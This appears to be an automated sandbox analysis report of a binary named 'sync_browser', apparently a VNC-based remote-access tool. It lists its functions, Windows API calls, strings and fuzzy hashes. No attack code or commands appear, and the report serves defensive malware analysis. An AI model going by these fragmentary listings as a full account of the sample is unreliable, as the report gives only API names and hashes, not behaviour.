Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Global$FreeUnlock
String ID:
API String ID: 1239146723-0
Opcode ID: abdc864418634cf1197187ec179a29c8207377b801291dd9a7c0c602e8c7d055
Instruction ID: 335b68659c3854b1ae3e0ef85ecbe4ffc334d59f04201cceb8f3c697bf2ed721
Opcode Fuzzy Hash: abdc864418634cf1197187ec179a29c8207377b801291dd9a7c0c602e8c7d055
Instruction Fuzzy Hash: 32213933A29A4182FB409F65E85016CA3A8FBA4F88F180535FA4EC7666CF7CD4998740

Function 00007FF67E813690 Relevance: 6.0, APIs: 4, Instructions: 47fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

OutputDebugStringA.KERNEL32(?,?,?,?,?,00007FF67E81385F), ref: 00007FF67E8136A9
GetStdHandle.KERNEL32(?,?,?,?,?,00007FF67E81385F), ref: 00007FF67E8136D1
WriteConsoleA.KERNEL32 ref: 00007FF67E8136EE
WriteFile.KERNEL32(?,?,?,?,?,00007FF67E81385F), ref: 00007FF67E813725

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Write$ConsoleDebugFileHandleOutputString
String ID:
API String ID: 1934604790-0
Opcode ID: aa49c59b5da7e2634850ce4aacb17eb8463b37466091e8bd9ee96f81ef6cd0f2
Instruction ID: ac7ee2e66bdd1b507c21fd4af3f33146b3bc88fd4a977fe1821cdf1826e4d8a5
Opcode Fuzzy Hash: aa49c59b5da7e2634850ce4aacb17eb8463b37466091e8bd9ee96f81ef6cd0f2
Instruction Fuzzy Hash: E911E326A28A8040E7508B79A4043A9F7A1EB45FF4F184325EEBD47BD4CF3CC489C300

Function 00007FF67E884FA8 Relevance: 6.0, APIs: 4, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF67E884FB2

Part of subcall function 00007FF67E883848: _amsg_exit.LIBCMT ref: 00007FF67E88385E

_lock.LIBCMT ref: 00007FF67E884FE0
free.LIBCMT ref: 00007FF67E885016
_amsg_exit.LIBCMT ref: 00007FF67E88504F

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: _amsg_exit$_getptd_lockfree
String ID:
API String ID: 2148533958-0
Opcode ID: 67261a7475787b32431de27056b085c578b22756a177dc977607e34beed0a1e5
Instruction ID: bb15a097f8174aea0ec10ac34925a1f443bab4816093aef03007847f72012f1f
Opcode Fuzzy Hash: 67261a7475787b32431de27056b085c578b22756a177dc977607e34beed0a1e5
Instruction Fuzzy Hash: E8114C27A3964182EA949B10D4407B9B264FB64740F080235FE4D877A6DF2CE459C741

Function 00007FF67E857520 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF67E857534
ReleaseSemaphore.KERNEL32 ref: 00007FF67E857577
GetLastError.KERNEL32 ref: 00007FF67E857581
LeaveCriticalSection.KERNEL32 ref: 00007FF67E85758C

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterErrorLastLeaveReleaseSemaphore
String ID:
API String ID: 540623443-0
Opcode ID: 1ef8894c349e896affc9970763aea91ebceedb24d96a9e68f30ae080b1782f5f
Instruction ID: 29f7e4ef42b12bccb7261e2d55e4dfe58ac296a7e35b508627d2f9bdd0c16bb5
Opcode Fuzzy Hash: 1ef8894c349e896affc9970763aea91ebceedb24d96a9e68f30ae080b1782f5f
Instruction Fuzzy Hash: 5D113C23A38A4286EB80CF65D9446A8A3A4FB68B84F405431EA4E86614DF3DD599C700

Function 00007FF67E885878 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF67E88587E

Part of subcall function 00007FF67E883848: _amsg_exit.LIBCMT ref: 00007FF67E88385E

_getptd.LIBCMT ref: 00007FF67E88589E
_lock.LIBCMT ref: 00007FF67E8858B1
_amsg_exit.LIBCMT ref: 00007FF67E8858DF

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: _amsg_exit_getptd$_lock
String ID:
API String ID: 3670291111-0
Opcode ID: a8d2708ae87b95b4ee220a0a01a88b12f7926cd03621c5a20977671bdb7db4c5
Instruction ID: ae7cc578fb19191e4ef5b59c50e1c2bc67021079dd7b5ca2338a5f5813d5c82b
Opcode Fuzzy Hash: a8d2708ae87b95b4ee220a0a01a88b12f7926cd03621c5a20977671bdb7db4c5
Instruction Fuzzy Hash: D8F0F422E3A04686FA55AB61D841BB99A60EF64B00F480276FE0CDB3D2DE1CA848D711

Function 00007FF67E7D9570 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF67E7D957C
ExtEscape.GDI32 ref: 00007FF67E7D959E
ExtEscape.GDI32 ref: 00007FF67E7D95BB
ReleaseDC.USER32 ref: 00007FF67E7D95C6

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Escape$Release
String ID:
API String ID: 2350829361-0
Opcode ID: c485e33178795d9909b89da61998c10babd3cfe1ac8502836bf93b7e6d891906
Instruction ID: 8eea6ffad894448d54cc1bbd4ba64f8526fded096ffc7f3b4e839f106dbd8502
Opcode Fuzzy Hash: c485e33178795d9909b89da61998c10babd3cfe1ac8502836bf93b7e6d891906
Instruction Fuzzy Hash: FFF06D32A2864187EB208B24B955A2AB2A9FB98788F544135EE4A42E24CE3CD015CB04

Function 00007FF67E7CBCB0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 00007FF67E7CBE11
recv.WS2_32 ref: 00007FF67E7CBE51

Strings

Enter SOCKS5 password for %s@%s: , xrefs: 00007FF67E7CBCF7

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: recvsend
String ID: Enter SOCKS5 password for %s@%s:
API String ID: 740075404-2439350543
Opcode ID: a17d5de74fc3eb428b78c132b62d7971fded7c0904e229c4df4fc2bd377388f3
Instruction ID: 1419ac57f37a4c788e60922b603098612a89690fc7a22a3eb5e5763b2b925645
Opcode Fuzzy Hash: a17d5de74fc3eb428b78c132b62d7971fded7c0904e229c4df4fc2bd377388f3
Instruction Fuzzy Hash: 0551D4A3718A8144E7308B79A4403B96A94FB59BA8F544735FF6D83BE5DE2CD509C700

Function 00007FF67E7CAED0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 110COMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 00007FF67E7CB015

Strings

., xrefs: 00007FF67E7CAFC0
., xrefs: 00007FF67E7CAF50

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: htonl
String ID: .$.
API String ID: 2009864989-3769392785
Opcode ID: ca89c10cae28c705ea3385c970d3d674c35f6ab879636ad9786b4f134b09557f
Instruction ID: 606474dda36f2dd4195c02bd379f0b5960f0b0e44cc2a03b11a88a23032aa986
Opcode Fuzzy Hash: ca89c10cae28c705ea3385c970d3d674c35f6ab879636ad9786b4f134b09557f
Instruction Fuzzy Hash: AE41E153B2C68209F7219A36E85017DBADC5F66794F186631FE6AC62E6CE3CD449C301

Function 00007FF67E7EC090 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E87A220: _errno.LIBCMT ref: 00007FF67E87A168
Part of subcall function 00007FF67E87A220: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67E87A173

GlobalAlloc.KERNEL32 ref: 00007FF67E7EC1AE
DeleteFileA.KERNEL32 ref: 00007FF67E7EC1D6

Strings

!UVNCDIR-, xrefs: 00007FF67E7EC0CF

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: AllocDeleteFileGlobal_errno_invalid_parameter_noinfo
String ID: !UVNCDIR-
API String ID: 2642416944-2720985186
Opcode ID: 06c9f7cff8713e7e821de9c1934e86ea9f9c841a539949df6008114534a2a042
Instruction ID: d55b0a917b4f46f7c721e0d978d0d6419ab4ee203bfbaf132290ac804c3adbd1
Opcode Fuzzy Hash: 06c9f7cff8713e7e821de9c1934e86ea9f9c841a539949df6008114534a2a042
Instruction Fuzzy Hash: C741A36262CBC185EB268B24E4143FAA791FBA5780F448131EA9E877C6DF3CD60DC700

Function 00007FF67E879748 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF67E879789
_invalid_parameter_noinfo.LIBCMT ref: 00007FF67E879794

Strings

B, xrefs: 00007FF67E8797AB

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: B
API String ID: 2959964966-1255198513
Opcode ID: fae824a938474a811c26b963b90f3490e738d7e0b0a4b014d759f685275f7447
Instruction ID: cf7bf694e34f30cb2a1c27f582a56a1846f5762fb3de791f749e645436702905
Opcode Fuzzy Hash: fae824a938474a811c26b963b90f3490e738d7e0b0a4b014d759f685275f7447
Instruction Fuzzy Hash: D8314233B2462189E7119FB9A4404AD7774BB187A8F554136FE1DA3B88DF3DD449C300

Function 00007FF67E7D2FE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF67E7D3009
SetCurrentDirectoryA.KERNEL32 ref: 00007FF67E7D3041

Strings

" -service, xrefs: 00007FF67E7D30BF

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CurrentDirectoryFileModuleName
String ID: " -service
API String ID: 3981628254-877726483
Opcode ID: 652a7e476fb5583efac58b4f6f8a379321410797b9c15688e010ce01b59f6f92
Instruction ID: 66e392a7486730e0241a4e1eee4f14de1b587c5c952814ad11494f0603be7d7a
Opcode Fuzzy Hash: 652a7e476fb5583efac58b4f6f8a379321410797b9c15688e010ce01b59f6f92
Instruction Fuzzy Hash: 3231F526A28AC094E720CB20F8043B9B7A1FFA8351F404332E6AC836D5DE3CE118C700

Function 00007FF67E7D3EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF67E7D3F18
PlaySoundA.WINMM ref: 00007FF67E7D3F85

Strings

ding_dong.wav, xrefs: 00007FF67E7D3F59

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: FileModuleNamePlaySound
String ID: ding_dong.wav
API String ID: 3032721342-215479118
Opcode ID: 99ee9350481aafcb6135d7bf9a7cc864814340ecd75d5fca49f2cd5505f22af1
Instruction ID: 81b47c4495f9cf45d06de029da0a6320b0b002beb3eaf7a2b5a98db05a6c5bd5
Opcode Fuzzy Hash: 99ee9350481aafcb6135d7bf9a7cc864814340ecd75d5fca49f2cd5505f22af1
Instruction Fuzzy Hash: E5113326B28A4592E7248B35F85536AA2A1FF58760F405336FA7DC76D4DF3CD114C710

Function 00007FF67E7DFF00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

getpeername.WS2_32 ref: 00007FF67E7DFF3E
inet_ntoa.WS2_32 ref: 00007FF67E7DFF48

Strings

<unavailable>, xrefs: 00007FF67E7DFF55

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: getpeernameinet_ntoa
String ID: <unavailable>
API String ID: 1982201544-1096956887
Opcode ID: 66207f79876192fdddc093b2a6677a5d5b27d89d397317eb0c0bd4430368bfbf
Instruction ID: fa50ef86830ad0a465db787d1a58f89ae2fe1af6c13d18e527a9ed6833fab154
Opcode Fuzzy Hash: 66207f79876192fdddc093b2a6677a5d5b27d89d397317eb0c0bd4430368bfbf
Instruction Fuzzy Hash: 120192A3B2564582EF50DB14E49537973A0FB98B89F440031FA4E8B364DF3CD599CB00

Function 00007FF67E7CD9D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

OpenFileMappingA.KERNEL32 ref: 00007FF67E7CDA07
MapViewOfFile.KERNEL32 ref: 00007FF67E7CDA2D

Strings

{34F673E0-878F-11D5-B98A-00B0D07B8C7C}, xrefs: 00007FF67E7CD9FB

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: File$MappingOpenView
